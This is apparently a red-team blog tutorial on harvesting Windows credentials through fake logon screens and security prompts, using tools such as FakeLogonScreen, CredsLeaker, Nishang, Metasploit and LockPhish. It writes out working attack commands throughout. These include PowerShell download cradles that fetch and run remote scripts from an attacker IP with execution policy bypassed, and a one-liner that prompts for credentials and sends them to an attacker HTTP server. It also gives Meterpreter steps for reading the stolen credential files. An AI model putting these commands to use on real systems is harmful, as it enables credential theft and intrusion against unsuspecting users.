How To Phish Windows Credentials: It is very common in Windows environments when programs are executed to require the user to enter his domain credentials for authentication like Outlook, authorization of elevation of privileges (User Account Control), or simply when Windows are inactive (Lock Screen). Mimic this behavior of Windows can lead to harvest credentials of Windows users that could be used for lateral movement during red team assessments. This technique can be useful when an initial foothold has been achieved on the system and the credentials of the user cannot be discovered by alternative methods.
C# – The FakeLogonScreen
The modern red teaming technique requires tradecraft to be based in C# language since it allows in-memory execution by various frameworks such as Cobalt Strike, Covenant, etc. The FakeLogonScreen is a Windows utility that was developed in C# by Arris Huijgen that will mimic the Windows logon screen in an attempt to obtain the password of the current user.
The tool has the ability to show the background that is currently configured in order to reduce the risk of security-conscious users spotting this malicious operation.
When the user enters his password on the fake login screen it will perform a validation against the Active Directory or locally to ensure that the password is correct. The password will be displayed in the console.
There is also a secondary binary that is part of the project and stores the credentials to a file (user.dB) on the local disk. Specifically executing the following will read the file that contains the credentials of the domain user.
| 1 | type C:\Users\pentestlab.PENTESTLAB\AppData\Local\Microsoft\user.db |
A similar assembly binary called SharpLocker was developed by Matt Pickford that upon execution will show a fake login screen to the user.
Every single keystroke will be captured on the console until the password of the user is fully uncovered.
PowerShell
Windows security input prompts are very common since applications in corporate environments might ask the users on a regular basis to authenticate. Microsoft outlook is one product that performs this request for credentials often in a domain environment. A tool that attempts to mimic a Windows security prompt is CredsLeaker which requires a web server to store the necessary files that will read the credentials and write them in a text file and PowerShell to invoke the HTTP request. The PowerShell commands can be executed directly from a BAT file.
| 1 | run.bat |
Prior to the execution of the BAT file information on the project, files should be modified to target the web server that stores the configuration, PHP, and PowerShell files. When the BAT file is executed a Windows security popup will be displayed to the user.
The tool performs validation against the credentials and the popup will only disappear if supplied credentials are correct. The Domain, hostname, username, and password will be written into the following location.
| 1 | /var/www/html/creds.txt |
Matt Nelson developed a PowerShell script that will spawn an input prompt with the capability to check if the credentials are valid as otherwise, the prompt is not closing. The script can be executed from a remote location and the credentials will be displayed in the console.
| 1 | powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt |
Nishang framework also contains a PowerShell script that could be used to create a fake input prompt in order to harvest windows credentials.
The input prompt will contain a message to the user that credentials are required to perform this operation. More security-aware users might identify that something has been executed in the background but this is not fully applied to all corporate users.
When credentials of the users are entered into the Windows box these will be displayed back to the console.
Alternatively, the script could be executed from a remote location to evade detection.
| 1 | powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-CredentialsPhish/ps1')); Invoke-CredentialsPhish |
Rob Fuller introduced in his blog the attack of capturing Windows credentials using a Metasploit module and PowerShell. Metasploit Framework contains modules that can capture credentials over various protocols (FTP, SMB HTTP, etc.).The following module can be used in order to set up a basic HTTP server that will require authentication.
| 12 | use auxiliary/server/capture/http_basicset URIPATH / |
PowerShell can be used to deploy the attack of phishing windows credentials by creating an input prompt and use the credentials to initiate an HTTP request to the Metasploit server so the credentials could be captured.
| 1234567 | $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wc = new-object net.webclient;$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');$result = $wc.downloadstring('http://10.0.0.13/'); |
The arbitrary input prompt needs to use UTF-16LE character encoding and be converted to Base64.
| 12 | cat popup.txt | iconv -t UTF-16LEcat popup.txt | iconv -t UTF-16LE | base64 -w0 |
Executing the following from a Windows command prompt or a shell will display to the user the fake windows input prompt.
| 1 | powershell.exe -ep bypass -enc <base64> |
The Metasploit module will obtain the request with the credentials.
Metasploit
Metasploit Framework contains a module that has the capability to spawn an input prompt when a specific process or any process is created. The module must be linked into an existing Meterpreter session and the process needs to be defined.
| 1234 | use post/windows/gather/phish_windows_credentialsset SESSION 3set PROCESS *run |
The wildcard * instructs the module to monitor all the processes that are running on the system and wait for a new instance to start in order to display the fake input prompt to the user.
The input prompt will be displayed to the user as a credential request from the process in order to start.
When the user enters his credentials these will be captured and displayed back to the console.
Alternatively, the module can be configured to monitor only for the creation of a specific process.
BASH – Using LockPhish
Lockphish is another tool with the capability to implement a phishing attack against the Windows logon screen. The associated template will be hosted into a PHP server and by default uses YouTube in order to redirect the user after his credentials have been submitted.
| 1 | bash lockphish.sh |
Social engineering is required in order to trick the user to click the direct link that is hosting the fake login screen.
A fake login screen will be displayed on the screen of the user that will require the password of the Administrator account. However, compared to other tools that target the lock screen the alignment of the password field is not accurate, and the fact that requires the Administrator account instead of the current user account might alter the user. Furthermore, it doesn’t perform any validation locally or in the active directory.
Once the user enters his credentials a redirection will follow to the YouTube website.
The credentials will be displayed back in the console.
Binary
Prior to the C# and PowerShell age, this attack was executed from an arbitrary executable. The binary supported two parameters in order to allow the penetration tester to specify the target domain and the file name that will store the captured credentials.
| 1 | execute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt" |
The binary was distinguished as an Outlook application (Outlook 2010, Outlook 2013) in order to fool the blue team since it was touching the disk. The input prompt was displayed to the user similar to PowerShell-based input prompts.
Credentials were stored into a hidden folder inside %AppData% and the following commands could be executed from a Meterpreter session to execute the attack and to read the captured credentials.
| 123456 | cd %AppData%upload OUTLOOK.exeexecute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt"cd Localcd Tempcat creds.txt |
